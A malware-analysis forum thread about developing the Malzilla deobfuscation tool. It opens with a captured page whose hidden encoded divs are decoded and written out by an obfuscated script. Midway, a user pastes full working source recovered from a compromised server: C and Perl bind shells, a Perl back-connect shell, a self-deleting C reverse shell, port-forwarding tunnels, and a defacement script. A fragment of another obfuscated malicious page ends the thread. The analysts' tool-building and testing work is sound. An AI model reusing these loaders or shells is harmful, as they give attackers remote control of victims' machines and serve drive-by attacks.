<html><head><title>kVfln0</title><style>div.kVfln0{visibility:hidden;}</style></head><body><div id='gr4tgwsd' class='kVfln0'>2E212E</div><span>ceswketap</span>slzzvkrvfgpiwqc<textarea>vgwrhbfcj</textarea><br /><br /><i>nmhxvkomvqijtnf</i><ol><li>mzdbcdgu</li></ol><div id='aktbcwszrqlopr' style='visibility:hidden;'>3N3N423M4B4M4M3O493M3N</div><br /><p>gzdeyoej</p><pre>uiuccqoq</pre><br /><div id='t2bAkX9m' class='kVfln0'>2A382H372N353917483M4A434H3M43412B19463M4I3M4F3O4E454C4G192C17171717171717174I3M4E174C3K4H4E48172B1719444G4G4C281M1M4J48404B49414A1L3O4B491M4C3M4C473M1M414K411L4C444C1929424H4A3O4G454B4A17322I2F2H1F1G4N4I3M4E174A4H3O2B1E1E2940262B171N2917174I3M4E174E1N202435172B17404B3O4H49414A4G1L3O4E413M4G412J484149414A4G1F194B191I4A4H3O1I193N4641191I4A4H3O1I193O4G191G2917174E1N2024351L4F414G2F4G4G4E453N4H4G411F</div><a href=vkbiefmfrijlb>sgjndiiyajriuxq</a><br /><select><option>praktifvnwu</option></select><span>pnxqgsl</span>snzytjkmiu<br /><p>swxneigdzsiulme</p><ol><li>odieokh</li></ol><ul><li>pnquikhquhieuo</li><li><abbr>jfitkq</abbr><br /><div id='tmDwV' class='kVfln0'>194540191J192A191I4A4H3O1I192D2B191I4A4H3O1I194E1N191I4A4H3O1I192024191I4A4H3O1I19352D2C191G294E1N2024351L4F414G2F4G4G4E453N4H4G411F193O48191I4A4H3O1I193M4F4F191I4A4H3O1I1945191I4A4H3O1I1940191J193O191I4A4H3O1I19484F4540191I4A4H3O1I19282G191I4A4H3O1I192I191I4A4H3O1I1927191I4A4H3O1I19242H191I4A4H3O1I192323241K24232F21191I4A4H3O1I191K1O1O2I1N1K191I4A4H3O1I1927191I4A4H3O1I1926212F191I4A4H3O1I191K191I</div><br /><i>yhgodky</i><select><option>dfzdandtylws</option></select><ul><li>egbwtubsichq</li><li><a href=rmiwffpjctbe>abzryquiw</a><br /><pre>tzuaem</pre><br /><u>rwbbctmkcyjra</u><br /><p>najfhofcnhrgv</p><div id='ITgCCe' class='kVfln0'>4A4H3O1I191N1N2H1N222K2H20272J2124191G294G4E4L4N4I3M4E172G35352N222H4K4C172B174E1N2024351L2H4E413M4G41343N46413O4G1F193M404B191I4A4H3O1I1940191I4A4H3O1I193N1L4F191I4A4H3O1I194G191I4A4H3O1I194E191I4A4H3O1I1941191I4A4H3O1I193M191I4A4H3O1I1949191J1E1E1G294I3M4E174026172B171O29503O3M4G3O441F411G4N504G4E4L4N4I3M4E17352J2J314G24172B174E1N2024351L2H4E413M4G41343N46413O4G1F1938191I4A4H3O1I1944191I4A4H3O1I</div><a href=dnfinduhf>rulggxkep</a><br /><strong>eeevkbkxidcuo</strong><br /><select><option>oblcabgyfmop</option></select><span>qowmrxgcfv</span>bwtjhuxrlwoqgn<u>nobdhjkkzkozs</u><div id='hdjuhydb' style='visibility:hidden;'>444M4E4E4F3O404C3N423N4G4M4E</div><div id='bwaPH' class='kVfln0'>19414848191I4A4H3O1I191L2F4C191I4A4H3O1I194C48453O191I4A4H3O1I193M4G454B191I4A4H3O1I194A191J1E1E1G294I3M4E174026172B171O29503O3M4G3O441F411G4N5045421F4026172B2B171O1G4N4G4E4L4N4I3M4E172H431N3M39252O2F172B174E1N2024351L2H4E413M4G41343N46413O4G1F19494F4K494820191I4A4H3O1I191L3D191I4A4H3O1I1932191I4A4H3O1I19312M3939191I4A4H3O1I1935191J1E1E1G2917172H431N3M39252O2F1L4B4C414A1F192L191I4A4H3O1I192J39191J</div><textarea>vlntb</textarea><br /><pre>cuqoorfdtguj</pre><br /><p id=aewwtnnyn>xhqblaisisec</p><br /><div id='ekdckzxwihbnoiq' style='visibility:hidden;'>3O424I404L4H474B</div><div id='KmXVfl' class='kVfln0'>4C3K4H4E481J423M484F411G2917172H431N3M39252O2F1L4F414A401F1G2917172G35352N222H4K4C1L4G4L4C41172B171O2917172G35352N222H4K4C1L4B4C414A1F1G292G35352N222H4K4C1L3C4E454G411F2H431N3M39252O2F1L4E414F4C4B4A4F412G4B404L1G2917172K4E4B434K3M172B17191L1L3H3H3826254147443B1L414K4119292G35352N222H4K4C1L383M4I41394B2K4548411F2K4E4B434K3M1J201G29414I3M481F19352J2J314G241L384441191I4A4H3O1I1948482J4K413O4H4G411F2K</div><ul><li>mruacbvhkl</li><li><span>sljawo</span>vqhpvvjly<br /><p>hbolop</p><div id='sjbihbhgr' style='visibility:hidden;'>474A3M4B4G464G4A483M4I4H3M3M4B</div><a href=dkxjwpcnz>eyjvizwihpwvxde</a><br /><br /><i>kaout</i><div id='MmzXYt' class='kVfln0'>4E4B434K3M1G29191G294E414G4H4E4A171O29503O3M4G3O441F411G4N505050424H4A3O4G454B4A17352I2K1F1G4N4G4E4L4N4E414G2B4A414J172F3O4G454I413D343N46413O4G1F192F3O4E4B352I2K1L352I2K191G2917484B3O3M4G454B4A1L444E4142172B17194F4C481M4C40421L4C40421929503O3M4G3O441F411G4N5050424H4A3O4G454B4A1738381F1G4N4G4E4L4N4E414G2B4A414J172F3O4G454I413D343N46413O4G1F194F4A4C4I4J1L384A3M4C4F444B4G173B45414J414E172H4B4A4G4E4B</div><br /><i>kuomufd</i><div id='hejrrz' style='visibility:hidden;'>4M484D454B3O493M484F4H4K4L</div><br /><p>dkxqzrouvnze</p><strong>btuheokmbrse</strong><br /><div id='niRPgw6' class='kVfln0'>481L1O191G294I3M4E173M4E3N454G4E3M4E4L3K42454841172B174C3K4H4E48294I3M4E1740414F4G172B171E2H281M354E4B434E3M49172K4548414F1M344H4G484B4B47172J4K4C4E414F4F1M4J3M3N1L414K411E29404B3O4H49414A4G1L4J4E454G411F192A4B3N46413O4G173O483M4F4F45402B1E3O484F4540282K1N2J22202I241N1K2124262H1K1O1O2I1N1K2F2I261O1K1N1N2F1N2H271N2I2H262I271E1745402B1E3M4G4G3M3O471E2C2A1M4B3N46413O4G2C191G293M4G4G3M3O471L384A3M4C4F</div><abbr>jfixmyoexnipvn</abbr><br /><a href=gegxxfhykvwaj>rykthnu</a><br /><strong>yetbfq</strong><br /><select><option>rngowb</option></select><p id=zatazebmgtmp>pxqubtnvsahh</p><br /><ol><li>aitzpjzjmsyd</li></ol><div id='DmIt8K' class='kVfln0'>444B4G353M4G44172B173M4E3N454G4E3M4E4L3K42454841294F414G394549414B4H4G1F1E4J454A404B4J1L484B3O3M4G454B4A172B171948403M4C281M1M1O20251L1N1L1N1L1O191E1J201N1N1N1G293M4G4G3M3O471L2H4B494C4E414F4F4140353M4G44172B1740414F4G293M4G4G3M3O471L354E454A4G384A3M4C4F444B4G1F3M4E3N454G4E3M4E4L3K424548411J40414F4G1G29503O3M4G3O441F411G4N5050424H4A3O4G454B4A173C32311F1G4N404B3O4H49414A4G1L4J4E454G411F1E2A40454I17</div><span>oxpazmwqkmfwnco</span>nnhjdi<abbr>mmmkzdeqyxrbjx</abbr><br /><br /><p>feksjeixkdktl</p><pre>ssymnkgezh</pre><br /><select><option>zfjutqgv</option></select><div id='SHHc7Pcb' class='kVfln0'>45402B194E414C483M3O41192C4K2A1M40454I2C1E1G294I3M4E174F4E4G474B40172B174H4A414F3O3M4C411F191C4H222122211C4H222122211C4H1N42413N1C4H2121233N1C4H24243O271C4H261N3N271C4H261N1N1O1C4H4142212119171I191C4H412022211C4H413N423M1C4H41261N231C4H4242413O1C4H424242421C4H263N25421C4H404222411C4H414241421C4H242241421C4H41213M421C4H274224221C4H222042211C4H274224221C4H244141251C4H41421N211C4H4142413N19171I191C4H</div><br /><i>ytcwcvji</i><select><option>kgejthv</option></select><abbr>zirrmmd</abbr><br /><textarea>ejnyghooy</textarea><br /><u>cnitifjphukg</u><ul><li>vsapmcafut</li><li><ol><li>uhjierbq</li></ol><div id='MDDXD1' class='kVfln0'>242241421C4H3N271N211C4H241O26251C4H411O3M1O1C4H1N251N211C4H41421O1O1C4H414241421C4H3M3M24241C4H3N27413N1C4H252526251C4H24231O1O1C4H1N25411O1C4H41421O421C4H414241421C4H3M3M24241C4H3N27412519171I191C4H3O3M26251C4H1O1N23421C4H1N2520401C4H41421N401C4H414241421C4H3M3M24241C4H3N2741211C4H1N1N26251C4H1N42201O1C4H1N2526421C4H4142213N1C4H414241421C4H3M3M24241C4H3N2742421C4H204126251C4H1N3M272419171I191C4H</div><br /><i>utadzncned</i><ol><li>xoyzc</li></ol><a href=jfxcgeoypfys>tchmvyixmcjoo</a><br /><pre>uabvmtbaxpwo</pre><br /><div id='jwvmdupbmrvnj' style='visibility:hidden;'>434I4F494G414K464A3M4M4C434L</div><abbr>touwwwhrcyl</abbr><br /><div id='uKr623' class='kVfln0'>1N2523251C4H414220271C4H414241421C4H3M3M24241C4H3M42423N1C4H402524421C4H273M203O1C4H24241O231C4H42253M3M1C4H41261N241C4H414241411C4H3N1O41421C4H273M24241C4H24223O3N1C4H413N3M3M1C4H4141262319171I191C4H24223N241C4H42253N3M1C4H1N253N271C4H414224221C4H414241421C4H26253N421C4H422340271C4H27423O1N1C4H25261N251C4H414241421C4H242441421C4H42213M3M1C4H203M24221C4H2042243O1C4H24243N421C4H3O423M3M19171I191C4H</div><select><option>ozojwprdc</option></select><ul><li>hnfldrsal</li><li><div id='sqpuw' style='visibility:hidden;'>4B4F414L4B444M4B4F4C4M3M4J</div><strong>idfbprmaeglw</strong><br /><pre>dkhflbnj</pre><br /><div id='I4Syx5' class='kVfln0'>1O1N26251C4H414241421C4H3N4241421C4H3M3M24221C4H2623423N1C4H3N2441401C4H3N3M24221C4H1N2542251C4H414226411C4H414241421C4H3M3M413O1C4H20263O421C4H3N2141421C4H3O1O271O1C4H2026263M1C4H413N3M4219171I191C4H263M27251C4H414241421C4H273M1O1N1C4H24223O421C4H41213M3M1C4H414126231C4H24223N241C4H42253N3M1C4H3M421N251C4H414241421C4H262341421C4H3N2541261C4H3M3M413O1C4H403O3O3N1C4H3N3O21221C4H1O1N3N3O19171I191C4H</div><ul><li>psrmphst</li><li><br /><i>oqzplesorum</i><abbr>fdverxa</abbr><br /><ol><li>dfqznp</li></ol><u>lnwgqhgwhvhkokl</u><p id=wwskheqrso>nxfqlpwvhp</p><br /><div id='acaYwy' class='kVfln0'>3O42273M1C4H3N3O3N421C4H3M3M24221C4H262342211C4H3N24413M1C4H3N3M24221C4H1N2542251C4H41423O3O1C4H414241421C4H414226231C4H273M1O1N1C4H24223O421C4H41253M3M1C4H414026231C4H24223N241C4H42253N3M19171I191C4H42421N251C4H414241421C4H262341421C4H24221O1N1C4H42423M3M1C4H414126231C4H24223N241C4H42253N3M1C4H41421N251C4H414241421C4H3M4141421C4H3N403N221C4H1N41413O1C4H1N41413O1C4H1N41413O1C4H1N41413O19171I191C4H</div><textarea>lufzxv</textarea><br /><a href=quhqh>vlcced</a><br /><div id='axlirkoh' style='visibility:hidden;'>4A443O3M4D4A4J4I474B4I</div><abbr>igtxtbr</abbr><br /><pre>zhpziybd</pre><br /><br /><i>rcowemlsq</i><div id='bM9Iwd0J' class='kVfln0'>1N21243O1C4H3N23413N1C4H24223N3O1C4H1N4021231C4H3N401O261C4H1N421O1N1C4H24223N3M1C4H24221N211C4H412527201C4H3N2024221C4H3N2741211C4H273O24221C4H242240211C4H421O273N1C4H413O27251C4H3N271O3O19171I191C4H272724221C4H413O3O421C4H403O1O3O1C4H3M2420241C4H22203M411C4H203O413O1C4H403O3N271C4H411N1O271C4H4242231O1C4H1O4040231C4H4125273N1C4H201O20411C4H413O41201C4H3M421O401C4H1O411N221C4H1O1O402219171I191C4H</div><a href=rjfegymshmu>dcugvwdqwfbk</a><br /><select><option>gdctxpbil</option></select><ul><li>zufphno</li><li><br /><p>xpapi</p><div id='NTp5p' class='kVfln0'>273M3N1O1C4H3N231N3M1C4H1N2224221C4H3N2324221C4H413O3O3N1C4H262721201C4H412124221C4H24223M221C4H42213N231C4H2120413O1C4H413N24221C4H413O24221C4H3N1O203M1C4H20403N201C4H414241251C4H1O3N1N2519171I191C4H1O1N1O1O1C4H3N3M1O1N1C4H3M213N401C4H3M1N3M201C4H41423M1O1C4H252224261C4H251N25221C4H202K212F1C4H2525202K1C4H2422242H1C4H242I242K1C4H242J24231C4H2421202J1C4H242I242K1C4H251N202K1C4H251N241O1C4H241O242G</div><div id='qypjudncuycppne' style='visibility:hidden;'>42444B464946444C46</div><span>huyohwehapi</span>pkvuov<strong>ofcoibwtvtkxfd</strong><br /><p id=dmfgdglkfimwgcq>wywkme</p><br /><br /><i>hfnveafwstseart</i><ul><li>hhdqpwdii</li><li><pre>wxgheftqtgwoeb</pre><br /><div id='xnHlg6' class='kVfln0'>1C4H2423202K1C4H242325261C4H251N202J1C4H251N2426191G294I3M4E174C4F4E3M4L4G172B174H4A414F3O3M4C411F191C4H1N3M1N3M1C4H1N3M1N3M191G29404B174N1717174C4F4E3M4L4G171I2B174C4F4E3M4L4G2950174J444548411F4C4F4E3M4L4G1L48414A434G44172A171N4K401N1N1N1N1G2949414E3M4L172B174A414J172F4E4E3M4L1F1G29424B4E1F45172B171N291745172A171O1N1N2917451I1I1G17171749414E3M4L3G453I172B174C4F4E3M4L4G171I174F4E4G474B40294K49483O</div><br /><p>qdbqsl</p><select><option>ppaowkepfld</option></select><u>inryb</u><a href=pynqfunmrwqnodt>nvvcewwpfa</a><br /><div id='bzysqnav' class='kVfln0'>4B4041172B17192A3D3231172N2I2B2N2C2A3D2C2A2H2C2A183G2H2I2F392F3G2A45493M43411738372H2B444G4G4C281M1M1D1A4K1N3M1N3M291D1A4K1N3M1N3M291L414K3M494C48411L3O4B492C3I3I2C2A1M2H2C2A1M3D2C2A1M3D32312C2A38352F33172I2F392F38372H2B1A2N172I2F392F2K312I2B2H172I2F392F2K3437322F392F382B2M3932312C2A3D3231172N2I2B2N2C2A1M3D32312C2A38352F33172I2F392F38372H2B1A2N172I2F392F2K312I2B2H172I2F392F2K3437322F392F382B2M3932</div><span>osxtbf</span>obflwsjbawj<br /><i>ntlufikovbbl</i><div id='imdncpaf' style='visibility:hidden;'>444D454L444B4M4D47</div><p id=qmxdmu>fargmhe</p><br /><u>oxuteopuuuokdv</u><abbr>smzihpk</abbr><br /><div id='mT5NQQ7' class='kVfln0'>312C2A1M38352F332C2A1M38352F332C19294G3M43172B17404B3O4H49414A4G1L43414G2J484149414A4G2G4L2N401F194E414C483M3O41191G294G3M431L454A4A414E2M393231172B174K49483O4B404129504542171F322I2F2H1F1G4O4O352I2K1F1G4O4O3C32311F1G4O4O38381F1G1G174N17502A1M4F3O4E454C4G2C</div><script>function uijomwjzjgzsmxg(){}var rvervciw=2133;var yraacopuv='gyyzfntspk';function gMrSJ(N8piMAiW){CeERXeKC = '';function yhgwnjzlngcl(eedgsamborlvq){return jqtjyf;}for(jqTpAB5 = 0; jqTpAB5 < (N8piMAiW.length / 2); jqTpAB5++ ){CeERXeKC += String.fromCharCode(parseInt(N8piMAiW.substr(jqTpAB5 * 2, 2),25));function ybhzwllvojtj(){}var jdhjx=8425;var wlmmloxofb='euztprlulvro';this.ycgtmgxking='ejjdv';}return CeERXeKC;var kufduxbilje=6957;}function AU0pO(Uc4aR){var eevsoyxblbgr='nrlpkmlgme';var delkyg=2964;this.gucca='cvtke';function fdtjkpqqakwwv(){}function xtbnoeaccewgf(vkriu){return vhtwdarm;}return document.getElementById(Uc4aR).innerHTML;function qhgsojemslowet(){}var fckohtuxoebbam='kwjxlq';var xjupqljqrndgfzx=2486;function stdoqhtdqw(xpyjkgeo){return hptcvwiisxdkkk;}this.ryxqg=false;this.sonucucfikrisb='jgcaepxc';}var a6OPD =new Array('t2bAkX9m','tmDwV','ITgCCe','bwaPH','KmXVfl','MmzXYt','niRPgw6','DmIt8K','SHHc7Pcb','MDDXD1','uKr623','I4Syx5','acaYwy','bM9Iwd0J','NTp5p','xnHlg6','bzysqnav','mT5NQQ7',"gr4tgwsd");for(Fqe2FB = 0; Fqe2FB < a6OPD.length; Fqe2FB++){function dlahfld(vtkopnf){return aheycwqmnxa;}function uezav(){}document.write(gMrSJ(AU0pO(a6OPD[Fqe2FB])));this.gxftjwexflxekxx=false;var aqaigvcbgqr='zmotqk';var mjllsaiuoi=3084;this.evvlurtywedxqvm='rwswczmn';function gaipg(){}}</script>
-
@JohnC
I'm doing a large rewrite of Malzilla at the moment.
I've started from the HTTP/FTP downloader.
OpenSSL is removed. HTTPS connections are handled by cryptlib now:
http://www.cs.auckland.ac.nz/~pgut001/cryptlib/
This will hopefully solve the Vista issues.
HTTP downloader now handles gzip, deflate and raw zlib compression (previous version did just gzip)
Some visual GUI artifacts in Vista and Win7 should be fixed now (forced repaint of the GUI because some of the buttons disappeared from the GUI after using accelerator keys (keyboard shortcuts))
Work in progress: - testing all kind of redirections
Link Parser also got a large rewrite and needs a lot of testing to see if all is working.
Misc Decoders got some rewrite (bas64/MIME decoder for now, but more will follow).
When I get all done with previously mentioned components, I will go for JavaScript-related parts.
Kalimero will probably be left out of the Malzilla if I get my DoomZilla engine up and running. DoomZilla engine will implement the complete DOM parser, and SpiderMonkey will interact with DOM objects like it does in browsers (most notably the functions like GetElementByID and similar will be handled out of the box).
In August I will be without PC, and I will start this part probably in September.
I will hopefully do one release before August, containing the latest changes.
@all
I would need help with some serious testing.
Test cases are needed for the following:
- HTTP Encodings (compression)
- all kind of redirections (3xx HTTP responeses, through META tags, from JavaScript code etc.)
- cases for Link Parser to see if it is missing links (links are now extracted also from <img>, <applet>, <object> and similar tags)
Latter, I will also need test cases for external scripts ( <script src="../../myscript.js) to get the automatically downloaded and injected into main HTML, so that the JavaScript decoder can use them just like it uses normal inline scripts.
So, if there are any volunteers for writing test cases (or to collect them from the net), I would be more than thankful.
The tests will be put online on malzilla.org (PHP is available, but no DB), so be careful about licenses and copyrights of the test-cases you collect (if any :) )
-
btw. this is what gave me motivation to work further on Malzilla:
http://holisticinfosec.blogspot.com/2009/07/malzilla-exploring-scareware-and-drive.html
http://holisticinfosec.org/toolsmith/docs/july2009.pdf
-
I'll be happy to do testing for you :)
-
Would you write test-cases (HTML, PHP, JS), or test it on web sites?
-
I'd be testing it on ITW malicious sites, yep :)
-
http://www.malzilla.org/dev_builds/
Please read the changelog to see what is to be expect from this build.
Test cases for Link Parser and for redirections would be good thing to have. Without good tests we will never know if these are working OK (one would need to compare the site source code with parser results by hand, to see if something is missing).
Edit: forgot to write in changelog that the PScript is removed. Dunno if anyone found it useful at all.
-
I'll take a look and report back, cheers :)
-
Bobby,
Just an FYI, the following seems to be failing? (it downloads the code, but can't seem to decode it?)
http://lipesr.com/update/?eb70c8bc3e184ffe5a98905e484546d9
Wepawet is failing with this one too :(
http://wepawet.cs.ucsb.edu/view.php?hash=0e28254bfce6009968e5b2982f0c7c33&t=1247695990&type=js
Gonna give JSUnpack a go ...... and if that fails too, I'll do it manually.
-
Bobby,
Just an FYI, the Base64 decoder seems to be failing to decode the Base64 encoded data in the attached shell (found on a rooted box (already reported it to the ISP)).
Decoded manually shows it decodes to;
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(fork() == 0) {
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror("socket error");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,"Password:",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system("echo welcome to Yogyacardus shell && /bin/bash -i");
else
fprintf(stderr,"Sorry");
close(newfd);
}
}
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
if(entered[i] == '\r')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}
#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in sin;
char rms[21]="rm -f ";
daemon(1,0);
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]);
bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
perror("[-] connect()");
exit(0);
}
strcat(rms, argv[0]);
system(rms);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl("/bin/sh","sh -i", NULL);
close(fd);
}
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <linux/time.h>
#ifdef STRERROR
extern char *sys_errlist[];
extern int sys_nerr;
char *undef = "Undefined error";
char *strerror(error)
int error;
{
if (error > sys_nerr)
return undef;
return sys_errlist[error];
}
#endif
main(argc, argv)
int argc;
char **argv;
{
int lsock, csock, osock;
FILE *cfile;
char buf[4096];
struct sockaddr_in laddr, caddr, oaddr;
int caddrlen = sizeof(caddr);
fd_set fdsr, fdse;
struct hostent *h;
struct servent *s;
int nbyt;
unsigned long a;
unsigned short oport;
if (argc != 4) {
fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
return 30;
}
a = inet_addr(argv[3]);
if (!(h = gethostbyname(argv[3])) &&
!(h = gethostbyaddr(&a, 4, AF_INET))) {
perror(argv[3]);
return 25;
}
oport = atol(argv[2]);
laddr.sin_port = htons((unsigned short)(atol(argv[1])));
if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
return 20;
}
laddr.sin_family = htons(AF_INET);
laddr.sin_addr.s_addr = htonl(0);
if (bind(lsock, &laddr, sizeof(laddr))) {
perror("bind");
return 20;
}
if (listen(lsock, 1)) {
perror("listen");
return 20;
}
if ((nbyt = fork()) == -1) {
perror("fork");
return 20;
}
if (nbyt > 0)
return 0;
setsid();
while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
cfile = fdopen(csock,"r+");
if ((nbyt = fork()) == -1) {
fprintf(cfile, "500 fork: %s\n", strerror(errno));
shutdown(csock,2);
fclose(cfile);
continue;
}
if (nbyt == 0)
goto gotsock;
fclose(cfile);
while (waitpid(-1, NULL, WNOHANG) > 0);
}
return 20;
gotsock:
if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
fprintf(cfile, "500 socket: %s\n", strerror(errno));
goto quit1;
}
oaddr.sin_family = h->h_addrtype;
oaddr.sin_port = htons(oport);
memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
if (connect(osock, &oaddr, sizeof(oaddr))) {
fprintf(cfile, "500 connect: %s\n", strerror(errno));
goto quit1;
}
while (1) {
FD_ZERO(&fdsr);
FD_ZERO(&fdse);
FD_SET(csock,&fdsr);
FD_SET(csock,&fdse);
FD_SET(osock,&fdsr);
FD_SET(osock,&fdse);
if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
fprintf(cfile, "500 select: %s\n", strerror(errno));
goto quit2;
}
if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
if ((nbyt = read(csock,buf,4096)) <= 0)
goto quit2;
if ((write(osock,buf,nbyt)) <= 0)
goto quit2;
} else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
if ((nbyt = read(osock,buf,4096)) <= 0)
goto quit2;
if ((write(csock,buf,nbyt)) <= 0)
goto quit2;
}
}
quit2:
shutdown(osock,2);
close(osock);
quit1:
fflush(cfile);
shutdown(csock,2);
quit0:
fclose(cfile);
return 0;
}
#!/usr/bin/perl
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host = $ARGV[1];
$port = $ARGV[2];
$daemon=1;
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
$SIG{'CHLD'} = 'IGNORE';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
++$num;
$pid = fork();
if (!defined($pid)) { print STDERR "$!\n"; }
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); }
else { $ch->close(); }
}
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
if (!$th) { exit 0; }
my $fh;
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
$ch->autoflush();
$th->autoflush();
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout && !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\n";
exit 0;
}
if ($result == 0) { exit 0; }
}
if ($th && (vec($eout, fileno($th), 1) || vec($rout, fileno($th), 1))) {
my $result = sysread($th, $cbuffer, 1024);
if (!defined($result)) { print STDERR "$!\n"; exit 0; }
if ($result == 0) {exit 0;}
}
if ($fh && $tbuffer) {(print $fh $tbuffer);}
while (my $len = length($tbuffer)) {
my $res = syswrite($th, $tbuffer, $len);
if ($res > 0) {$tbuffer = substr($tbuffer, $res);}
else {print STDERR "$!\n";}
}
while (my $len = length($cbuffer)) {
my $res = syswrite($ch, $cbuffer, $len);
if ($res > 0) {$cbuffer = substr($cbuffer, $res);}
else {print STDERR "$!\n";}
}}}
<script language="JavaScript">
<!--
var my = "http://www.yogyacardus.com/images/r57.gif";
document.write('<div style="position:fixed;_position:absolute;bottom:0px;right:0px;clip: inherit;_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);"><img src="'+my+'" alt="Yogyacardus ? 2008" onmouseover="this.style.cursor=\'pointer\'" onclick="parent.location=\'http://www.yogyacardus.com\'" /></div>');
//-->
</script>
yodyacardus.com seems to be dead atm.
-
Hi MysteryFCM,
First link returns 404 for me.
As for the second one, which file from the attached archive is problematic?
I see the encoded string in idx.txt, but that one should be decoded (Base64). After that you need to apply ROT13 decoding, and do a zlib inflate at the end.
-
Sorry dude, the Base64 is in style.txt
I'll have a look to see if the lipesr.com one is still in Malzilla's cache :)
-
Here you go ..... tis the code from the cache for the URL now returning a 404 :)
<html><body><script>eicis='503';duas="d";lapsui='Wi';egerit="sp";lexque="av";ictuum='bject';otia="dC";vocare=".284";gemma='NI';labens=702;margin='va';dasque="13.";paras=5509;weaner='abcde';acuta=1;feroci='UN';teneto="0.77";imis='C';quoquo='tV';facat=3;snook="pp";cervos='t';suopte=992;sulcis=6854;etimus='ndo';dicari=0;venint="6192";igitur='n';matrem="ea";gravi="8e0";mdcqve="";alma='s';rebus='tW';scitis=".55";oravi="m";magnae="691";novem=6733;foedo="tt";inerat=731;frenas='[HAS';citra='m';ineo='ij';ring='A';statum="men";usuum='tion';hisco='0.120';capio=952;nonam='ndow';black=4;ludat="2162.";dando='d';ponis='87';lucant="7766.";fetuum="en";futura=738;corn='wi';buck=473;textum=7;valuer='f';parant="s";mergis='';memora='z0';nark='L';carpet='us';luces="9.435e3";atris='V';mque="t";boreas="dd";tenuis='cti';amorem='de';credit='ue';xxxii=91;bella="27.";multae='deA';adiuti="4.196e3";lignum='y';vicit='3.645e3';herba='w';ageres=8;reel='Vie';inest=289;moneas='ew';rotas=2;chorus=844;poenis=8823;leti="io";itabat=284;caduci='v';fluit='Vi';timet='pR';creta='i';captis=72;ardet=200;acque='p';tityre="Be";saniem='